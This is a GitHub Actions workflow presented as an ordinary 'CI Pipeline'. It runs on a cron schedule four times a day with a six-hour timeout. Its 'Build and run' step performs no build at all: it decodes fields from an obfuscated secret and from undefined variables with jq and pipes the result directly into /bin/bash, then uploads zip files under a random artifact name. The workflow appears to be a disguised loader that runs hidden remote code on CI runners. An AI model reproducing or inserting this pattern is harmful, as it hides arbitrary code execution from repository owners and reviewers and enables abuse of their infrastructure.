name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '13 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          i636: ${{ secrets.i636 }}
        run: |
          printf '%s' "$i636" | jq -r .zzmdc59423 | /bin/bash
          printf '%s' "$cmqc8546" | jq -r .i0490 | /bin/bash
          echo $tvt09801 | jq -r .lny77 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: TCfixsAv
          path: "*.zip"
          retention-days: 1
